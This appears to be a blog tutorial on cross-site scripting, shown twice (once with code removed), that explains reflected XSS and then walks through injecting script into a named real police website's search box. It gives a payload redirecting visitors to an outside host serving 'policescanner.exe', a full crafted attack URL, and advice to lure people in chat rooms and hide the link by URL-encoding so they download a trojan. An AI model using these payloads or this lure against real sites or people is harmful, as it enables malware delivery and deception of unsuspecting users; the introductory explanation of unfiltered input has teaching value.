Introduction:
=======
In this tutorial i will show you
how XSS works and how you can use it..
What is an XSS ?
==================
An XSS is an vurnability in an web-application
that can cause hackers to execute scripts
on the client side...
Dangers of XSS...
these day's browser keep some of the
dangers of XSS outside..
Like.. if an script want to
write/edit edit files on the computer
it needs extra permission from the user...
or by some browsers it just get blocked...
How does XSS Work ?
if an user posts something to an webpage
ex:
the search engine shows what KeyWord the user typed..
Example:
I gave the keyword:
You see that the search engine outputs my keyword again..
If an web-aplication processes the input from the user
without filtering, for example the user input:
xss-tutorial
it will be like this in the source:
In this case its seems very normal:
But what if the user input was:
it would be in the source like this:
this doesnt look very normal on the screen:
So what happend, is that the user input
was actually a javascript..
that didnt got filtert by the web-application
it didnt filter characters like: '</>
An browser builds an page by reading the source
it reads every HTML code and shows
then directly on the screen..
Scripts languages like javascripts ,
get executed too then...
It might be that you are an bit confusing, i will try to make it more clear:
Well this happens when an web-application ( like an search engine ) doesnt filter the user-input:
1. As keyword you enter an javascript..
2. the search engine checks if youre keywords matches the records, and then builds an page with the results..
3. the SearchEngine builds the rest of the page ( like ads and stuff ).. and s directly ( without filtering it first ) puts your keyword in the page too...
4. The webserver sends the page ( source ) to you...
5. Your browser reads every line/code from the source and shows it on the screen.
6. finally the browser also reads your javascript input .. <script></script> .. and executes it..
i hope its a bit clear now how it works..
i will show you some examples of how to use XSS,
and why its a big problem...
How to find and use xss ?
XSS is dangrous because people get mislead easily..
There are scripts that like. steal user-cookies ...
hackers can abuse those stolen cookies..
Im not going further on cookie-stealing, but i will give
you an other example on how to abuse xss vurnability's...
Like i said, you can mislead people by using those XSS Vurnability's...
You can someone to make download something,
By using an XSS on an trusted website..
Example:
You wouldnt expect that downloading something
from
would be some
kind of malware ( trojan or something )..
Well lets if we can change that...
We gonna search for an XSS vurnabiity on that website...
Goto..
You will see an search functions under the banner..
Lets see if the search engine filters our keyword...
Enter as keyword:
Click then on GO..
Yeahh, it worked !
Well how can we abuse this ??
We that we can put javascripts as keywords..
And most people would suspect hat website of something bad...
So its good enough to mislead people with it..
We could enter an javascript that would redirect people to an trojan.. ( in this im not using an trojan )..
well if that is wha we want to do..
We will using this little script then:
go back too:
And enter that script in the search engine and click on go...
hehe, look at there.. we have been redirected to our file...
This file named: policescanner.exe , could be an trojan
You could go in to an chat room or community
and say its an police scanner !
You would just gave the link in your browser then,
People mostly read the first part of the link, before clicking on it...
in this case:
Well, they gonna think its an LAPD website, and your talking about an police scanner, so why not download it ?
Maybe when someone looks closely and he might see the link to your trojan...
and they will notice its fake...
but no worry's, with an URL-Encoder you can 'mask' that ...
Just encode your link to the 'policescanner' like this:
replace the link of the 'policescanner' tot the encoded text..
Makeup an good story etc.. and people will really download it..
Tool used in tutorial:
URL Encoder -
=======
In this tutorial i will show you
how XSS works and how you can use it..
What is an XSS ?
==================
An XSS is an vurnability in an web-application
that can cause hackers to execute scripts
on the client side...
Dangers of XSS...
these day's browser keep some of the
dangers of XSS outside..
Like.. if an script want to
write/edit edit files on the computer
it needs extra permission from the user...
or by some browsers it just get blocked...
How does XSS Work ?
if an user posts something to an webpage
ex:
Code:
http://search.live.com
Example:
I gave the keyword:
Code:
www.djoedjoe.com
If an web-aplication processes the input from the user
without filtering, for example the user input:
xss-tutorial
it will be like this in the source:
Code:
........ <p> your keyword was: xss-tutotorial </p> .......
In this case its seems very normal:
But what if the user input was:
Code:
<script>alert("xss-tutorial");</script>
it would be in the source like this:
Code:
.....
<p>Your keyword was: <script>alert("xss-tutorial");</script> </p>
.....
this doesnt look very normal on the screen:
So what happend, is that the user input
was actually a javascript..
that didnt got filtert by the web-application
it didnt filter characters like: '</>
An browser builds an page by reading the source
it reads every HTML code and shows
then directly on the screen..
Scripts languages like javascripts ,
get executed too then...
It might be that you are an bit confusing, i will try to make it more clear:
Well this happens when an web-application ( like an search engine ) doesnt filter the user-input:
1. As keyword you enter an javascript..
2. the search engine checks if youre keywords matches the records, and then builds an page with the results..
3. the SearchEngine builds the rest of the page ( like ads and stuff ).. and s directly ( without filtering it first ) puts your keyword in the page too...
4. The webserver sends the page ( source ) to you...
5. Your browser reads every line/code from the source and shows it on the screen.
6. finally the browser also reads your javascript input .. <script></script> .. and executes it..
i hope its a bit clear now how it works..
i will show you some examples of how to use XSS,
and why its a big problem...
How to find and use xss ?
XSS is dangrous because people get mislead easily..
There are scripts that like. steal user-cookies ...
hackers can abuse those stolen cookies..
Im not going further on cookie-stealing, but i will give
you an other example on how to abuse xss vurnability's...
Like i said, you can mislead people by using those XSS Vurnability's...
You can someone to make download something,
By using an XSS on an trusted website..
Example:
You wouldnt expect that downloading something
from
Code:
http://www.lapdonline.org/
kind of malware ( trojan or something )..
Well lets if we can change that...
We gonna search for an XSS vurnabiity on that website...
Goto..
Code:
http://www.lapdonline.org/
You will see an search functions under the banner..
Lets see if the search engine filters our keyword...
Enter as keyword:
Code:
<script>alert("test");</script>
Click then on GO..
Yeahh, it worked !
Well how can we abuse this ??
We that we can put javascripts as keywords..
And most people would suspect hat website of something bad...
So its good enough to mislead people with it..
We could enter an javascript that would redirect people to an trojan.. ( in this im not using an trojan )..
well if that is wha we want to do..
We will using this little script then:
Code:
<script>document.location="http://tuts.djoedjoe.com/basicxss/eng/policescanner.exe";</script>
go back too:
Code:
http://www.lapdonline.org/
hehe, look at there.. we have been redirected to our file...
This file named: policescanner.exe , could be an trojan
You could go in to an chat room or community
and say its an police scanner !
You would just gave the link in your browser then,
Code:
http://www.lapdonline.org/search_results/search/&view_all=1&chg_filter=1&searchType=content_basic&search_terms=%3Cscript%3Edocument.location=%22http://tuts.djoedjoe.com/basicxss/eng/policescanner.exe%22;%3C/script%3E
People mostly read the first part of the link, before clicking on it...
in this case:
Code:
http://www.lapdonline.org/
Maybe when someone looks closely and he might see the link to your trojan...
Code:
http://tuts.djoedjoe.com/basicxss/eng/policescanner.exe
but no worry's, with an URL-Encoder you can 'mask' that ...
Just encode your link to the 'policescanner' like this:
Code:
http://tuts.djoedjoe.com/basicxss/eng/images/xss6.JPG
Makeup an good story etc.. and people will really download it..
Tool used in tutorial:
URL Encoder -
Code:
http://files.djoedjoe.com/urlenc/urlenc.zip
0 comments:
Post a Comment